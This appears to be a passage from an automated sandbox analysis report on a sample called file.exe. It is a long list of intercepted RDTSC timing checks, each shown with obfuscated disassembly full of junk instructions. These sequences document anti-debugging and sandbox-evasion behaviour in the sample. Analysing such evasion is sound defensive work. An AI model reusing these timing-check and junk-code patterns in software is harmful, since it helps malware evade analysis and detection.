Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B919F second address: 7B91A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B91A3 second address: 7B91A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B91A7 second address: 7B91AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BAE8D second address: 7BAE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F28C4758076h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BAE9A second address: 7BAECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C47EE2C1h 0x00000008 jnc 00007F28C47EE2B6h 0x0000000e jmp 00007F28C47EE2C4h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C13AE second address: 7C13B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0354 second address: 7C0359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0359 second address: 7C0366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0366 second address: 7C0389 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F28C47EE2D1h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F28C47EE2BDh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0389 second address: 7C038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1065 second address: 7C107E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2BEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C107E second address: 7C1082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1082 second address: 7C1093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jnc 00007F28C47EE2B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1093 second address: 7C1099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C5A87 second address: 7C5A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 789AEF second address: 789B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D25E0h], ebx 0x00000010 lea eax, dword ptr [ebp+1247D8A7h] 0x00000016 sub dword ptr [ebp+122D194Fh], ebx 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 789B12 second address: 789B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A02C second address: 5DF807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+1244E86Dh], ebx 0x0000000d push dword ptr [ebp+122D0C41h] 0x00000013 mov dword ptr [ebp+122D186Eh], edx 0x00000019 call dword ptr [ebp+122D35E5h] 0x0000001f pushad 0x00000020 pushad 0x00000021 jmp 00007F28C4758089h 0x00000026 mov bx, di 0x00000029 popad 0x0000002a clc 0x0000002b xor eax, eax 0x0000002d cmc 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 mov dword ptr [ebp+122D2E76h], eax 0x00000038 mov dword ptr [ebp+122D27C6h], eax 0x0000003e stc 0x0000003f mov esi, 0000003Ch 0x00000044 jnl 00007F28C475808Dh 0x0000004a add esi, dword ptr [esp+24h] 0x0000004e pushad 0x0000004f sub bh, 00000056h 0x00000052 sub dword ptr [ebp+122D2E76h], ebx 0x00000058 popad 0x00000059 lodsw 0x0000005b mov dword ptr [ebp+122D2E76h], ecx 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 clc 0x00000066 mov ebx, dword ptr [esp+24h] 0x0000006a jmp 00007F28C4758085h 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F28C4758080h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A099 second address: 78A09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A09E second address: 78A0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0A8 second address: 78A0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0B9 second address: 78A0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0C3 second address: 78A0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0C7 second address: 78A0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0D8 second address: 78A0FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F28C47EE2C2h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A282 second address: 78A2A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A2A1 second address: 78A2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A7F2 second address: 78A7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78ACBA second address: 78ACBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78ACBE second address: 78ACD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78ACD0 second address: 78AD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F28C47EE2B8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+122D2A32h] 0x00000027 lea eax, dword ptr [ebp+1247D8EBh] 0x0000002d sub cl, FFFFFFD2h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F28C47EE2C0h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AD1B second address: 78AD4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F28C475807Fh 0x00000012 lea eax, dword ptr [ebp+1247D8A7h] 0x00000018 or edi, 771395A7h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 je 00007F28C4758076h 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AD4E second address: 78AD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AD68 second address: 772A12 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F28C4758078h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 call dword ptr [ebp+1244C8B5h] 0x0000002b push eax 0x0000002c jne 00007F28C475808Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 772A12 second address: 772A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4E52 second address: 7C4E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758081h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F28C475807Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C5326 second address: 7C5335 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C55A3 second address: 7C55C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F28C4758081h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jns 00007F28C4758076h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C55C5 second address: 7C55CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB79E second address: 7CB7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758088h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA1B3 second address: 7CA1C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C47EE2BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA1C9 second address: 7CA1CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA346 second address: 7CA34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAC84 second address: 7CAC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C4758082h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAC9E second address: 7CACF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C5h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F28C47EE2C0h 0x00000012 jmp 00007F28C47EE2C5h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F28C47EE2BEh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CACF6 second address: 7CAD1C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C4758076h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F28C4758086h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAE95 second address: 7CAE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAE9B second address: 7CAEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAEA3 second address: 7CAEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAEBD second address: 7CAED6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F28C475807Dh 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB62B second address: 7CB657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F28C47EE2BFh 0x0000000b pop esi 0x0000000c jmp 00007F28C47EE2C3h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9ED8 second address: 7C9EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F28C475807Ah 0x0000000f jmp 00007F28C4758080h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFC18 second address: 7CFC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFC1E second address: 7CFC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFC27 second address: 7CFC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D48ED second address: 7D48F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7739 second address: 7D7741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7741 second address: 7D7764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jno 00007F28C4758076h 0x0000000c jmp 00007F28C4758086h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7764 second address: 7D7774 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C47EE2C2h 0x00000008 jnl 00007F28C47EE2B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB7BB second address: 7DB7C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB7C0 second address: 7DB817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F28C47EE2BEh 0x0000000b popad 0x0000000c jmp 00007F28C47EE2C6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F28C47EE2C3h 0x00000019 jmp 00007F28C47EE2BCh 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007F28C47EE2B6h 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB817 second address: 7DB81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEBBE second address: 7DEBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F28C47EE2B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEBC9 second address: 7DEBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758082h 0x00000008 jmp 00007F28C475807Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F28C4758076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEBF3 second address: 7DEBF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEF2A second address: 7DEF58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758080h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F28C475807Ch 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 jbe 00007F28C475807Eh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEF58 second address: 7DEF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DF314 second address: 7DF318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DF318 second address: 7DF31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1EF7 second address: 7E1F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E205F second address: 7E2063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E8520 second address: 7E8526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E8526 second address: 7E852C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E6F4B second address: 7E6F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E6F51 second address: 7E6F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E6F5C second address: 7E6F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E70A0 second address: 7E70A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E725E second address: 7E7269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7269 second address: 7E7270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E73CA second address: 7E73CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E73CF second address: 7E73D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E73D5 second address: 7E73DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E76F2 second address: 7E7703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C47EE2B6h 0x0000000a jng 00007F28C47EE2B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7703 second address: 7E771A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C4758083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20E3 second address: 7F20E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20E7 second address: 7F20EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20EB second address: 7F20F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20F5 second address: 7F20F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20F9 second address: 7F20FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20FF second address: 7F2108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0010 second address: 7F002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F28C47EE2B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F28C47EE2BEh 0x00000014 rdtsc
